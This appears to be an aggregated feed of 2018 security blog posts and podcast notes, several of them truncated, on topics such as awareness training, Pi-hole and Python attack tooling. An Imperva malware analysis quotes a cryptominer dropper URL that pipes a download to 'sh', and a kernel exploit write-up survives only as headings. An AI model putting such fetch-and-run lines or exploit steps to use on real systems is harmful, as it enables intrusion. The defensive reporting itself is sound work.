You’ll also want to stage a widespread simulation a few months after the initial foray. Yes, you’ll be continuously testing employees as part of your continuous program. But getting a sense of company-wide results is also helpful. You should compare results from the initial test against the new results. Are fewer employees falling for the ruse? Are more reporting spammy and phishing emails to the central group? Ensuring the trend lines are moving in the right direction boosts the program and helps justify ongoing investment. You feed the results into the team scoring of the competition.
Lather, Rinse, Repeat
At some point, when another high-profile issue presents itself, you should take a similar approach. Let’s say your organization does a lot of business in Europe, so GDPR presents significant risk. You’ll want to train employees on how you define customer data and how to handle it.
Next determine whether you need special training for this issue, or whether you can integrate it into your more extensive bi-annual training for all employees. Every six months all employees sit for perhaps an hour, watching an update on both new hacker tactics and changes to corporate security policies.
Once that round of training completes, you will roll out new tests to highlight how customer data could be lost or stolen. Factor the new tests into your next competition as well, to keep focus on the changing nature of security and the ongoing contest.
Once your program is humming along, we suggest you pick a new high priority topic every six months to make that the focus of your semi-annual scheduled training. As part of addressing this new topic, you’ll integrate with the relevant controls to enable ongoing contextual training and perform an initial test (to establish a baseline), and then track improvement over time.
You’ll also want a more comprehensive set of reports to track the effectiveness of your awareness training; deliver this information to senior management, and perhaps the audit committee. Maybe each quarter you’ll report on how much contextual training employees received, and how much or little they repeated mistakes after training. You’ll also want to report on the overall number of successful attacks, alongside trends of which attacks worked and which got blocked. Being able to map those results back to training topics makes an excellent case for ongoing investment.
At some point the competition will end and you’ll crown the winner. We suggest making a big deal of the winning team. Maybe you can record the award ceremony with the chairperson and memorialize their victory in the company newsletter. You want to make sure all employees understand security is essential and visible at the highest echelons of your organization.
It’s a journey, not a destination, so ensure consistency in your program. Add new focus topics to extend your employee knowledge, keep your content current and interesting, and hold your employees to a high standard – make sure they understand expectations and the consequences of violating corporate policies. Building a security culture requires patience, persistence, and accountability. Anchoring your security awareness training program with continuous, contextual content will go a long way to establishing such a security culture.
With that we wrap up this series on Making an Impact with Security Awareness Training. Thanks again to Mimecast for licensing this content, and we’ll have the assembled and edited paper available in our Research Library within a couple weeks.- Mike Rothman (0) Comments Subscribe to our daily email digest
If you’ve been in the information security field for at least a year, you’ve undoubtedly heard your organization defend the lack of investment in, change to or optimization of a cybersecurity policy, mitigating control or organizational belief. This “It hasn’t happened to us so it likely won’t happen” mentality is called optimism bias, and it’s an issue in our field that predates the field itself.
Threats are constantly evolving and, just like everything else, tend to follow certain trends. Whenever a new type of threat is especially successful or profitable, many others of the same type will inevitably follow. The best defenses need to mirror those trends so users get the most robust protection against the newest wave of threats. Along those lines, Gartner has identified the most important categories in cybersecurity technology for the immediate future.
We wanted to dive into the newest cybersecurity products and services from those hot categories that Gartner identified, reviewing some of the most innovative and useful from each group. Our goal is to discover how cutting-edge cybersecurity software fares against the latest threats, hopefully helping you to make good technology purchasing decisions.
F-Secure Freedome in brief:
- P2P allowed: No
- Business location: Finland
- Number of servers: N/A
- Number of country locations: 22
- Cost: $50-$80 per year
- VPN protocol: OpenVPN
- Data encryption: AES 128-bit
- Data authentication: AES 128-bit
- Handshake encryption: 2048-bit RSA keys with SHA-256 certificates
There are a few VPN services that offer their own antivirus, one is Avira Phantom VPN Pro, which we looked at previously; Finland-based F-Secure is another. The company’s Freedome VPN is a premium service that offers 22 country locations around the world and extra freebies like tracker and malicious-site blocking.
This week, Paul and Matt Alderman talk about Threat and Vulnerability management, and how Cloud and Application security's impact on vendors can help with integration in the Enterprise! In the Enterprise News this week, Bomgar to be renamed BeyondTrust after acquisition, Attivo brings cyber security deception to containers and serverless, Symantec extends data loss prevention platform with DRM, ExtraHop announces the availability of Reveal(x) for Azure, and Cloud Native applications are at risk from Zero Touch attacks! All that and more on this episode of Enterprise Security Weekly!
Full Show Notes: https://wiki.securityweekly.com/ES_Episode108
Visit https://www.securityweekly.com/esw for all the latest episodes!
Visit https://www.activecountermeasures/esw to sign up for a demo or buy our AI Hunter!
→Visit our website: https://www.securityweekly.com
→Follow us on Twitter: https://www.twitter.com/securityweekly
→Like us on Facebook: https://www.facebook.com/secweekly
Threat groups such as GOLD KINGSWOOD are using their extensive resources and network insights to target high-value financial organizations around the world.
Threat groups such as GOLD KINGSWOOD are using their extensive resources and network insights to target high-value financial organizations around the world.
Last year, reports surfaced that Uber had been hit with a data breach, but instead of reporting it to the government or to those affected, it chose to cover it up. Now, the company will pay $148 million as part of a settlement, and the money will be disbursed between each US state and Washington, DC. After the hack and Uber's response to it became public, a number of states launched investigations into the incident while others filed lawsuits.
Source: New York Attorney General
Reachability and Impact
BUG_ON(), WARN_ON_ONCE(), and dmesg
- kernel.panic_on_oops will automatically cause a kernel panic when a BUG_ON() assertion triggers or the kernel crashes; its initial value can be configured using the build configuration variable CONFIG_PANIC_ON_OOPS. It is off by default in the upstream kernel - and enabling it by default in distributions would probably be a bad idea -, but it is e.g. enabled by Android.
- kernel.dmesg_restrict controls whether non-root users can access dmesg logs, which, among other things, contain register dumps and stack traces for kernel crashes; its initial value can be configured using the build configuration variable CONFIG_SECURITY_DMESG_RESTRICT. It is off by default in the upstream kernel, but is enabled by some distributions, e.g. Debian. (Android relies on SELinux to block access to dmesg.)
The exploit: Incrementing the sequence number
The exploit: Replacing the VMA
- Get the vm_area_struct reused in the same process. The process would then be able to use this VMA, but this doesn't result in anything interesting, since the VMA caches of the process would be allowed to contain pointers to the VMA anyway.
- Free the vm_area_struct such that it is on the slab allocator's freelist, then attempt to access it. However, at least the SLUB allocator that Ubuntu uses replaces the first 8 bytes of the vm_area_struct (which contain vm_start, the userspace start address) with a kernel address. This makes it impossible for the VMA cache lookup function to return it, since the condition vma->vm_start <= addr && vma->vm_end > addr can't be fulfilled, and therefore nothing interesting happens.
- Free the vm_area_struct such that it is on the slab allocator's freelist, then allocate it in another process. This would (with the exception of a very narrow race condition that can't easily be triggered repeatedly) result in hitting the WARN_ON_ONCE(), and therefore the VMA cache lookup function wouldn't return the VMA.
- Free the vm_area_struct such that it is on the slab allocator's freelist, then make an allocation from a slab that has been merged with the vm_area_struct slab. This requires the existence of an aliasing slab; in a Ubuntu 18.04 VM, no such slab seems to exist.
- advantage: not wiped on allocation
- advantage: permits writing at an arbitrary in-page offset if splice() is available
- advantage: page-aligned
- disadvantage: can't do multiple writes without first freeing the page, then reallocating it
- advantage: can repeatedly read and write contents from userspace
- advantage: page-aligned
- disadvantage: wiped on allocation
The exploit: Leaking pointers from dmesg
- address of the mm_struct
- address of the use-after-free'd VMA
- load address of kernel code
The exploit: JOP (the boring part)
- A patch lands in the upstream kernel.
- The patch is backported to an upstream-supported stable kernel.
- The distribution merges the changes from upstream-supported stable kernels into its kernels.
- Users install the new distribution kernel.
Python will soon be the world’s most prevalent coding language.
That’s quite a statement, but if you look at its simplicity, flexibility and the relative ease with which folks pick it up, it’s not hard to see why The Economist recently touted it as the soon-to-be most used language, globally. Naturally, our threat research team had to poke around and see how popular Python is among bad actors.
And the best place to do that, well, Github, of course. Roughly estimating, more than 20% of GitHub repositories that implement an attack tool / exploit PoC are written in Python. In virtually every security-related topic in GitHub, the majority of the repositories are written in Python, including tools such as w3af , Sqlmap, and even the infamous AutoSploit tool.
At Imperva, we use an advanced intelligent Client Classification mechanism that distinguishes and classifies various web clients. When we take a look at our data, specifically security incidents, the majority of the clients (>25%) we identify — excluding vulnerability scanners — are based on Python.
Unlike other clients, in Python, we see a host of different attack vectors and the usage of known exploits. Hackers, like developers, enjoy Python’s advantages which makes it a popular hacking tool.
Figure 1: Security incidents by client, excluding vulnerability scanners. More than 25% of the clients were Python-based tools used by malicious actors, making it the most common vector for launching exploit attempts.
When examining the use of Python in attacks against sites we protect, the result was unsurprising – a large chunk, up to 77%, of the sites were attacked by a Python-based tool, and in over a third of the cases a Python-based tool was responsible for the majority of daily attacks. These levels, over time, show that Python-based tools are used for both breadth and depth scanning.
Figure 2: Daily percentage of sites suffering Python-based attacks
The two most popular Python modules used for web attacks are Urllib and Python Requests. The chart below shows attack distribution. Use of the new module, Async IO, is just kicking off, which makes perfect sense when you consider the vast possibilities the library offers in the field of layer 7 DDoS; especially when using a “Spray N’ Pray” technique:
Python and Known Exploits
The advantages of Python as a coding language make it a popular tool for implementing known exploits. We collected information on the top 10 vulnerabilities recently used by a Python-based tool, and we don’t expect it to stop.
The two most popular attacks in the last 2 months used CVE-2017-9841 – a PHP based Remote Code Execution (RCE) vulnerability in the PHPUnit framework, and CVE-2015-8562 which is a RCE against the Joomla! Framework. It isn’t surprising that the most common attacks had RCE potential, considering how valuable it is to malicious actors.
Another example, which isn’t in the top 10, is CVE-2018-1000207, which had hundreds of attacks each day for several days during the last week of August 2018. Deeper analysis shows that the attack was carried out on multiple protected customers, by a group of IPs from China.
CVEs over time
You can see that the number of CVEs which are being used by attackers, according to our data, has increased in the last few years:
In addition, Python is used to target specific applications and frameworks – below you can find the top 10, according to our data:
When we looked at all the frameworks targeted by Python, the attacks that stand out are those aimed at Struts, WordPress, Joomla and Drupal, which is not surprising as these are currently some of the most popular frameworks out there.
The most popular HTTP parameter value we’ve seen used in attacks, responsible for around 30% of all different param values used, belongs to a backdoor upload attempt through a PHP Unserialize vulnerability in Joomla! using the JDatabaseDriverMysqli object. The backdoor uploaded payload is hosted on ICG-AuthExploiterBot.
We’ve also seen a recurring payload that turned out to be a Coinbitminer infection attempt, more details on that are in the appendix — note, the appendix is only meant as an example. Since Python is so widely used by hackers, there is a host of different attack vectors to take into consideration. Python requires minimal coding skills, making it easy to write a script and exploit a vulnerability.
Unless you can differentiate between requests from Python-based tools and any other tool, our recommendations stay the same – make sure to keep security in mind when developing, keep your system up to date with patches, and refrain from any practice that is considered insecure.
Appendix – Example of an Attack
Here’s an interesting, recurring payload we’ve observed (with a small variance at the end):
After base64 decoding it, we get a binary payload:
In the above payload, there is a mention of a GitHub repository for a deserialization exploitation tool and a wget command download in a jpg file, which strongly suggests there is malicious activity. After downloading the file from http://188.8.131.52/jre.jpg we can see that it’s actually a script containing the following:
The two last lines in the script try to get http://184.108.40.206/static/font.jpg%7Csh, which is identified as Trojan. Coinbitminer by Symantec Endpoint Protection.
This finding relates to a tweet from the end of August 2018, talking about a new Apache Struts vulnerability CVE-2018-11776 used to infect with the same Coinbitminer.
While you’re here, also read: Imperva Python SDK – We’re All Consenting SecOps Here
The post The World’s Most Popular Coding Language Happens to be Most Hackers’ Weapon of Choice appeared first on Blog.
This post is co-authored with Sam Perl.
The CERT Division of the Software Engineering Institute (SEI) at Carnegie Mellon University recently released the Cyobstract Python library as an open source tool. You can use it to quickly and efficiently extract artifacts from free text in a single report, from a collection of incident reports, from threat assessment summaries, or any other textual source.
Cybersecurity teams need to collect and process data from incident reports, blog posts, news feeds, threat reports, IT tickets, incident tickets, and more. Often incident analysts are looking for technical artifacts to help in their investigation of a threat and development of a mitigation. This activity is often done manually by cutting and pasting between sources and tools. Cyobstract helps extract key artifact values from any kind of text, allowing incident analysts to focus their attention on processing the data once it's extracted. Once artifact values are extracted, they can be more easily correlated across multiple datasets.
After using Cyobstract to extract security-relevant data types, the data can be used for higher level downstream analysis and investigation of source incident reports and data. The resulting data can also be loaded into a database, such as an indicator database. Using Cyobstract, the extracted artifacts can be used to quickly and easily find commonality and similarity across reports, thereby potentially revealing patterns that might otherwise have remained hidden.
At its core, the Cyobstract library is built around a collection of robust regular expressions that target 24 specific security-relevant data types of potential interest, including the following:
- IP addresses: IPv4, IPv4 CIDR, IPv4 range, IPv6, IPv6 CIDR, and IPv6 range
- hashes: MD5, SHA1, SHA256, and ssdeep
- Internet and system-related strings: FQDN, URL, user agent strings, email addresses, filenames, filepath, and registry keys
- Internet infrastructure values: ASN, ASN owner, country, and ISP
- security analysis values: CVE, malware, and attack type
Cyobstract is capable of extracting these artifacts even if they are malformed in some way. For example, in the incident response community, it's often standard practice for teams to "defang" indicators of compromise before storing them or sending them to another team. Defanged indicator values can be difficult for automated solutions to extract. There is no standard practice for defanging, so there are many ways it can be done. Cyobstract was built from a large collection of real incident reports from many organizations so it can handle many ways of defanging that CERT researchers have observed in the field.
In addition to the core extraction library, Cyobstract includes developer tools that teams can use to craft their own regular expressions and capture custom security data types. Analysts typically do this by using a list of names to extract; however, over time, that list can be large and slow to use in matching. Using Cyobstract, analysts can input their lists of terms to match (such as a list of common malware names) and get an optimized regex as output. This expression is significantly faster than trying to match directly to a name on a list.
The library also includes benchmarking tools that can track the effect of changes to regular expressions and present the analyst with feedback on the overall effectiveness of the individual change (e.g., this regex change found three more reports than the previous version).
The Cyobstract library can be downloaded from GitHub at https://github.com/cmu-sei/cyobstract.
Google’s Chrome 69 hides a disturbing twist: if you log into Gmail or another Google service, Chrome seems to automatically log you into the browser as well. Theoretically, that means that you will automatically begin sharing data with Google, like it or not.
The confusion comes from a new way in which Google shows your “logged in” status. Previously, if you were signed in to Chrome, an icon would appear in the upper right-hand corner, indicating that you were signed in and sharing data. The same icon now appears if you’re logged into a Google service like Google.com or Gmail, but not necessarily to Chrome.
Update 9/26/18: Google has announced upcoming changes to the way Chrome 70 handles sign-ins to address this issue.
We’re proud to announce the release of Winchecksec, a new open-source tool that detects security features in Windows binaries. Developed to satisfy our analysis and research needs, Winchecksec aims to surpass current open-source security feature detection tools in depth, accuracy, and performance without sacrificing simplicity.
Feature detection, made simple
Winchecksec takes a Windows PE binary as input, and outputs a report of the security features baked into it at build time. Common features include:
- Address-space layout randomization (ASLR) and 64-bit-aware high-entropy ASLR (HEASLR)
- Authenticity/integrity protections (Authenticode, Forced Integrity)
- Data Execution Prevention (DEP), better known as W^X or No eXecute (NX)
- Manifest isolation
- Structured Exception Handling (SEH) and SafeSEH
- Control Flow Guard (CFG) and Return Flow Guard (RFG)
- Guard Stack (GS), better known as stack cookies or canaries
Winchecksec’s two output modes are controlled by one flag (
-j): the default plain-text tabular mode for humans, and a JSON mode for machine consumption. In action:
Did you notice that Winchecksec distinguishes between “Dynamic Base” and ASLR above? This is because setting
/DYNAMICBASE at build-time does not guarantee address-space randomization. Windows cannot perform ASLR without a relocation table, so binaries that explicitly request ASLR but lack relocation entries (indicated by
IMAGE_FILE_RELOCS_STRIPPED in the image header’s flags) are silently loaded without randomized address spaces. This edge case was directly responsible for turning an otherwise moderate use-after-free in VLC 2.2.8 into a gaping hole (CVE-2017-17670). The underlying toolchain error in mingw-w64 remains unfixed.
Similarly, applications that run under the CLR are guaranteed to use ASLR and DEP, regardless of the state of the Dynamic Base/NX compatibility flags or the presence of a relocation table. As such, Winchecksec will report ASLR and DEP as enabled on any binary that indicates that it runs under the CLR. The CLR also provides safe exception handling but not via SafeSEH, so SafeSEH is not indicated unless enabled.
How do other tools compare?
- Microsoft released BinScope in 2014, only to let it wither on the vine. BinScope performs several security feature checks and provides XML and HTML outputs, but relies on
.pdbfiles for its analysis on binaries. As such, it’s impractical for any use case outside of the Microsoft Secure Development Lifecycle. BinSkim appears to be the spiritual successor to BinScope and is actively maintained, but uses an obtuse overengineered format for machine consumption. Like BinScope, it also appears to depend on the availability of debugging information.
- The Visual Studio toolchain provides
dumpbin.exe, which can be used to dump some of the security attributes present in the given binary. But
dumpbin.exedoesn’t provide a machine-consumable output, so developers are forced to write ad-hoc parsers. To make matters worse,
dumpbin.exeprovides a dump, not an analysis, of the given file. It won’t, for example, explain that a program with stripped relocation entries and Dynamic Base enabled isn’t ASLR-compatible. It’s up to the user to put two and two together.
- NetSPI maintains PESecurity, a PowerShell script for testing many common PE security features. While it provides a CSV output option for programmatic consumption, it lags in performance compared to
dumpbin.exe(and other compiled tools listed below), much less Winchecksec.
- There are a few small feature detectors floating around the world of plugins and gists, like this one, this one, and this one (for x64dbg!). These are generally incomplete (in terms of checks), difficult to interact with programmatically, sporadically maintained, and/or perform ad-hoc PE parsing. Winchecksec aims for completeness in the domain of static checks, is maintained, and uses official Windows APIs for PE parsing.
Winchecksec was developed as part of Sienna Locomotive, our integrated fuzzing and triaging system. As one of several triaging components, Winchecksec informs our exploitability scoring system (reducing the exploitability of a buffer overflow, for example, if both DEP and ASLR are enabled) and allows us to give users immediate advice on improving the baseline security of their applications. We expect that others will develop additional use cases, such as:
- CI/CD integration to make a base set of security features mandatory for all builds.
- Auditing entire production servers for deployed applications that lack key security features.
- Evaluating the efficacy of security features in applications (e.g., whether stack cookies are effective in a C++ application with a large number of buffers in objects that contain vtables).
This week, Keith and special guest host April Wright interview Ron Gula, Founder of Tenable and Gula Tech Adventures! They discuss security in the upcoming elections, how to maintain separation of duties, attack simulation, and more! In the Application Security News, Hackers stole customer credit cards in Newegg data breach, John Hancock now requires monitoring bracelets to buy insurance, the man who broke Ticketmaster, new security settings available in iOS 12, State Department confirms data breach exposed employee data, and more!
Full Show Notes: https://wiki.securityweekly.com/ASW_Episode33
Visit https://www.securityweekly.com/asw for all the latest episodes!
Visit https://www.activecountermeasures/asw to sign up for a demo or buy our AI Hunter!
→Visit our website: https://www.securityweekly.com
→Follow us on Twitter: https://www.twitter.com/securityweekly
→Like us on Facebook: https://www.facebook.com/secweekly
I have a love-hate relationship with ad blockers. On the one hand, I despise the obnoxious ads that are forced down our throats at what seems like every turn. On the other hand, I appreciate the need for publishers to earn a living so that I can consume their hard-earned work for free. Somewhere in the middle is a responsible approach, for example the sponsorship banner you see at the top of this blog. Companies I choose to partner with get to appear there and they get themselves 140 characters and a link. That is all. No images. No video. No script. No HTML tags. No tracking. Sponsors are happy as they get exposure, visitors are happy because there's none of the aforementioned crap and I'm happy because it pays a lot better than ads ever did anyway. It almost seems like everyone is happy. Almost...
As I wrote about a couple of years ago, ad blockers aren't always happy and frankly, attitudes like that just make the whole ad problem even worse. That post attracted hundreds of comments ranging from "I don't mind ads" to "burn them all with fire and the consequences be damned". But it's not just the detrimental impact of blocking the very source of a website's revenue that worries me, it's also the fact that running an ad blocker means giving a third party an enormous amount of power over your browser. This creates a different risk to ads themselves - a much more serious one if it comes to fruition - and it looks like this:
Do you use a popular browser extension? How confident are you that the creator wouldn’t accept a $10k offer to hand it over only to have it then go rogue on you? https://t.co/hPfW5CJLUz— Troy Hunt (@troyhunt) September 5, 2018
That's actually my top tweet over the last 4 weeks by a significant margin because it's one we can all relate to. I certainly went back and revisited all the browser extensions I had installed and killed a few unnecessary ones. Bottom line is that you really want to consider how much you trust the organisation (or in many cases, the person) behind the extensions you run and even when you do, there's no guarantee it won't be backdoored MEGA.nz style.
Which brings me to Pi-hole. I'm going to keep the intro bits as brief as possible but, in a nutshell, Pi-hole is a little DNS server you run on a Raspberry Pi in your local network then point your router at such that every device in your home resolves DNS through the service. It then blacklists about 130k domains used for nasty stuff such that when any client on your network (PC, phone, smart TV) requests sleazy-ad-domain.com, the name just simply doesn't resolve. Scott Helme put me onto this originally via his two excellent posts on Securing DNS across all of my devices with Pi-Hole + DNS-over-HTTPS + 220.127.116.11 and Catching and dealing with naughty devices on my home network. Go and read those because I'm deliberately not going to repeat them here. In fact, I hadn't even planned to write anything until I saw how much difference the service actually made. More on that in a moment, the one other bit I'll add here is that the Raspberry Pi I purchased for the setup was the Little Bird Raspberry Pi 3 Plus Complete Starter Kit:
This just made it a super easy turnkey solution. Plus, Little Bird Electronics down here in Aus delivered it really quickly and followed up with a personal email and a "thank you" for some of the other unrelated stuff I've been up to lately. Nice 🙂
I went with an absolute bare bones setup which essentially involved just following the instructions on the Pi-hole site (Scott gets a bit fancier in his blog posts). I had a bit of a drama due to some dependencies and after a quick tweet for help this morning followed by a question on Discourse, I was up and running. I set my Ubiquiti network to resolve DNS through the Pi and that's it - job done! As devices started picking up the new DNS settings, I got to see just how much difference was made. I set my desktop to manually resolve through Cloudflare's 18.104.22.168 whilst my laptop was using the Pi-hole which made for some awesome back to back testing. Here's what I found:
Let's take a popular local Aussie news site, news.com.au. Here's what it looks like with no Pi-hole:
In the grand scheme of ads on sites, not too offensive. Let's look at it from the machine routing through the Pi-hole:
Visually, there's not a whole lot of difference here. However, check out the network requests at the bottom of the browser before and after Pi-hole:
Whoa! That's an 80% reduction in network requests and an 82% reduction in the number of bytes transferred. I'd talk about the reduction in load time too except it's really hard to measure because as you can see from the waterfall diagrams, with no Pi-hole it just keeps going and going and, well, it all gets a bit silly.
Let's level it up because I reckon the smuttier the publication, the bigger the Pi-hole gain. Let's try these guys:
And for comparison, when loaded with the Pi-hole in place:
And now - (drum roll) - the network requests for each:
Holy shit! What - why?! I snapped the one without Pi-hole at 17.4 mins after I got sick of waiting. 2,663 requests (one of which was to Report URI, thank you very much!) and 57.6MB. To read the freakin' news. (Incidentally, in this image more than the others you can clearly see requests to domains such as fff.dailymail.co.uk failing as the Pi-hole prevents them from resolving.)
After just a few quick tests, I was pretty blown away by the speed difference. I only fired this up at about 8am this morning and I'm just 9 hours into it but already seeing some pretty cool stats:
It's also flagging a bunch of things I'd like to look at more, for example my wife's laptop being way chattier than everything else:
I haven't looked yet, but if anyone knows the purpose of that microsoft.com domain that continually get Pi-holed, leave a comment below (I assume it's related to the native Windows 10 mail client). And yes, I'll chat to her about the Fox News situation as well!
I'm yet to have any legit functionality break because of the Pi-hole, but Scott has had to whitelist a couple of domains (literally 2, from memory) such as the Google Analytics dashboard. Of course, it's entirely feasible that legit stuff will break and I myself have gone through troubleshooting pains on behalf of other people before only to then realise that it was their modification of my site that caused the failure. That's always going to be a risk and frankly, that's on me if my choice of tooling breaks something.
So in summary, no compromising devices, no putting your trust in the goodwill of an extension developer, no per-device effort, the bad stuff is blocked and the good stuff still works:
Lastly, Pi-hole has a donate page and this is one of those cases where if you find it as awesome as I have already, you should absolutely show them some love. Cash in some of that time you've reclaimed by not waiting for rubbish ads to load 😎
This week we look at additional changes coming from Google's Chromium team, another powerful instance of newer cross-platform malware, the publication of a 0-day exploit after Microsoft missed its deadline, the return of Sabri Haddouche with browser crash attacks, the reasoning behind Matthew Green's decision to abandon Chrome after a change in release 69... and an "UnGoogled" Chromium alternative that Matthew might approve of, Western Digital's pathetic response to a very serious vulnerability, a cool device exploit collection website, a question about the future of the Internet, a sobering example of the aftermarket in unwiped hard drives, the Mirai Botnet creators are now working with and helping the FBI, another fine levied against Equifax, and a look at Cloudflare's quick move to encrypt a remaining piece of web metadata.
We invite you to read our show notes.
Download or subscribe to this show at https://twit.tv/shows/security-now.
You can submit a question to Security Now! at the GRC Feedback Page.
This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:
- Former NSA staffer gets 66 months over incident at heart of Kaspersky scandal
- Zoho has a very bad week
- Telco lobby group raises some legit concerns over Australia’s “anti-encryption” legislation
- Twitter API leaks DMs
- Equifax fined by UK
- Yubikey 5 enables passwordless Windows logins
- Privacy International has an aneurism
- NSS Labs launches antitrust suit against security software makers
This week’s show is brought to you by Rapid7.
Jen Andre is this week’s sponsor guest. She was the founder of Komand, which was a security automation and orchestration company but is now a part of Rapid7 as of about mid way through last year. I spoke to Jen a bit about how she came to start Komand and where the security automation and orchestration discipline is at right now.
- Ex-NSA employee gets 5.5 years in prison for taking home classified info | ZDNet
- Domain registrar oversteps taking down Zoho domain, impacts over 30Mil users | ZDNet
- Peter Dutton to push through new security legislation as fears of "severely damaging" spyware murmur
- Twitter API bug leaked private data to other accounts
- Equifax fined maximum penalty under 1998 UK data protection law
- The Series 5 YubiKey Will Help Kill the Password | WIRED
- Press release: UK intelligence agency admits unlawfully spying on Privacy International | Privacy International
- UK spooks fess up to snooping on Privacy International's private data
- GCHQ's mass surveillance violates citizens' right to privacy, ECHR rules
- NSS Labs files antitrust suit against multiple cybersecurity vendors
- Hacking for ca$h | The Strategist
- Operator of 'VirusTotal for criminals' gets 14-year prison sentence
- Tencent engineer attending cybersecurity event fined for hotel WiFi hacking
- Snyk gets $22 million for platform that tracks security flaws in open source projects
- They Got 'Everything': Inside a Demo of NSO Group's Powerful iPhone Malware - Motherboard
- Content Moderator Sues Facebook, Says Job Gave Her PTSD - Motherboard
- Microsoft Rolls Out Confidential Computing for Azure
- Cloudflare Improves Privacy by Encrypting the SNI During TLS Negotiation
- This Windows file may be secretly hoarding your passwords and emails | ZDNet
- Security researcher claims macOS Mojave privacy bug on launch day | TechCrunch
- 0Day Windows JET Database Vulnerability disclosed by Zero Day Initiative
- Over 80 Cisco Products Affected by FragmentSmack DoS Bug
- Cisco patches 'critical' credential bug in video surveillance software
- Security Orchestration and Automation with InsightConnect | Rapid7
- Security Orchestration and Automation for Security Operations | Rapid7
- What are its aims/purposes or drivers?
- Where did it spring from? What triggered it? Why now? Why you?
- Is it business-led or IT or infosec or risk or what? Who is behind it? Who stands to benefit or be affected by it? Who are the stakeholders? Are they supportive and engaged, neutral/unaware, or reluctant and disengaged?
- What is it expected to lead into – if anything? Is the outcome entirely open at this point, depending on what the review finds, or are there pencil marks or proposals on the table already, perhaps secret agendas looking for fuses to light?
- What is the scope? Is it meant to be reviewing all of 'security' (whatever that means), or information security, or cybersecurity, or compliance, or strategy, or assurance, or software development security, or information flows, or something else? And why is that - what determines the scope? Why are some things in and others out of scope?
- And, not least, what is ‘security architecture’, or indeed 'architecture', in the specific context of the organization? In some organizations, architecture is central to strategy, making it the domain of senior, experienced managers, who are unlikely to task a clueless underling to review it. To others, it's about blueprints (literally) showing plan and elevation views, and Crime Prevention Through Environmental Design.
on the map ... oh and where are we heading?
If you own a smart TV, or even just a computer, it’s likely you have a Netflix account. The streaming service is huge these days – even taking home awards for its owned content. So, it’s only natural cybercriminals are attempting to leverage the service’s popularity for their own gain. In fact, just discovered last week, fake Netflix emails have been circulating claiming there are issues with users’ accounts. But of course, there is no issue at all – only a phishing scam underway.
The headline in itself should be the first indicator of fraud, as it reads “Update your payment information!” The body of the fake email then claims that there’s an issue with a user’s account or that their account has been suspended. The email states that they need to update their account details in order to resolve the problem, but the link actually leads victims to a genuine-looking Netflix website designed to steal usernames and passwords, as well as payment details. If the victim updates their financial information, they are actually taken to the real Netflix home page, which gives this trick a sense of legitimacy.
In short – this phishing email scheme is convincing and tricky. That means it’s crucial all Netflix users take proactive steps now to protect themselves this stealthy attack. To do just that, follow these tips:
- Be careful what you click on. Be sure to only click on emails that you are sure came from a trusted source. If you don’t know the sender, or the email’s content doesn’t seem familiar, remain wary and avoid interacting with the message.
- Go directly to the source. It’s a good security rule of thumb: when an email comes through requesting personal info, always go directly to the company’s website to be sure you’re working with the real deal. You should be able to check their account status on the Netflix website, and determine the legitimacy of the request from there. If there’s still anything in question, feel free to call their support line and check about the notice that way as well.
- Place a fraud alert. If you know your financial data has been compromised by this attack, be sure to place a fraud alert on your credit so that any new or recent requests undergo scrutiny. It’s important to note that this also entitles you to extra copies of your credit report so you can check for anything sketchy. And if you find an account you did not open, make sure you report it to the police or Federal Trade Commission, as well as the creditor involved so you can put an end to the fraudulent account.
"author": "Gary Davis",
"category": "Consumer Threat Notices",
"authordetail": "Gary Davis is Chief Consumer Security Evangelist. Through a consumer lens, he partners with internal teams to drive strategic alignment of products with the needs of the security space. Gary also provides security education to businesses and consumers by distilling complex security topics into actionable advice. Follow Gary Davis on Twitter at @garyjdavis",
"pubDate": "Tue 25 Sept 2018 12:35:48 +0000"
The post Netflix Users: Don’t Get Hooked by This Tricky Phishing Email appeared first on McAfee Blogs.
This week, WordPress sites backdoored with malicious code, Google's forced sign in to Chrome raises red flags, Newegg is victimized by Magecart Malware, a Woman hijacked CCTV cameras for Trump's inauguration, Bitcoin DDoS attacks, Cybercriminals target Kodi for Malware, and a Security Researcher is fined for hacking hotel Wifi. Jason Wood joins us for expert commentary on Google Chrome's "dark pattern" of poor privacy changes, on this episode of Hack Naked News!
Full Show Notes: https://wiki.securityweekly.com/HNNEpisode190
Visit https://www.securityweekly.com/hnn for all the latest episodes!
Visit https://www.activecountermeasures/hnn to sign up for a demo or buy our AI Hunter!!
→Visit our website: https://www.securityweekly.com
→Follow us on Twitter: https://www.twitter.com/securityweekly
→Like us on Facebook: https://www.facebook.com/secweekly
When people think about IoT devices, many often think of those that fill their homes. Smart lights, ovens, TVs, etc. But there’s a whole other type of IoT devices that are inside the home that parents may not be as cognizant of – children’s toys. In 2018, smartwatches, smart teddy bears, and more are all in kids’ hands. And though parents are happy to purchase the next hot item for their children, they sometimes aren’t fully aware of how these devices can impact their child’s personal security. IoT has expanded to children, but it’s parents that need to understand how these toys affect their family, and what they can do to keep their children protected from an IoT-based cyberthreat.
Now, add IoT into the mix. The reason people are commonly adopting IoT devices is for one reason – convenience. And that’s the same reason these devices have gotten into children’s hands as well. They’re convenient, engaging, easy-to-use toys, some of which are even used to help educate kids.
But this adoption has changed children’s online security. Now, instead of just limiting their device usage and screen time, parents have to start thinking about the types of threats that can emerge from their child’s interaction with IoT devices. For example, smartwatches have been used to track and record kids’ physical location. And children’s data is often recorded with these devices, which means their data could be potentially leveraged for malicious reasons if a cybercriminal breaches the organization behind a specific connected product or app. The FBI has even previously cautioned that these smart toys can be compromised by hackers.
Keeping connected kids safe
Fortunately, there are many things parents can do to keep their connected kids safe. First off, do the homework. Before buying any connected toy or device for a kid, parents should look up the manufacturer first and see if they have security top of mind. If the device has had any issues with security in the past, it’s best to avoid purchasing it. Additionally, always read the fine print. Terms and conditions should outline how and when a company accesses a kid’s data. When buying a connected device or signing them up for an online service/app, always read the terms and conditions carefully in order to remain fully aware of the extent and impact of a kid’s online presence and use of connected devices.
Mind you, these IoT toys must connect to a home Wi-Fi network in order to run. If they’re vulnerable, they could expose a family’s home network as a result. Since it can be challenging to lock down all the IoT devices in a home, utilize a solution like McAfee Secure Home Platform to provide protection at the router-level. Also, parents can keep an eye on their kid’s online interactions by leveraging a parental control solution like McAfee Safe Family. They can know what their kids are up to, guard them from harm, and limit their screen time by setting rules and time limits for apps and websites.
This week, Michael is joined by April Wright to interview Scott King, Sr. Director of Strategic Advisory Services at Rapid 7! In this two part interview, Michael and April talk with Scott about transitioning into his role at Rapid7, ICS Security, the best practices to understand how these systems work, holding accountability, and how legal and security share common goals!
